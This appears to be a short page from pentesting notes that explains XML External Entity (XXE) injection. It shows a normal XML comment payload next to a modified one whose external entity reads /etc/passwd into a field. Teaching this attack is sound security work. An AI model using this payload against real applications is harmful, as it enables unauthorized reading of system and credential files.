XML External Entity - XXE

From modifying an XML payload controlled by us, the user, we might be able to tell the XML parser to go and grab some data that we were not supposed to have access to. 

<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Jesus</name>
  <author>Boy</author>
  <com>blog post</com>
</comment>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///etc/passwd" >]>
<comment>
  <name>&name;</name>
  <author>Spongebob</author>
  <com>random stuff</com>
</comment>

PreviousXSS - Cross site scriptingNextInternal Recon

Last updated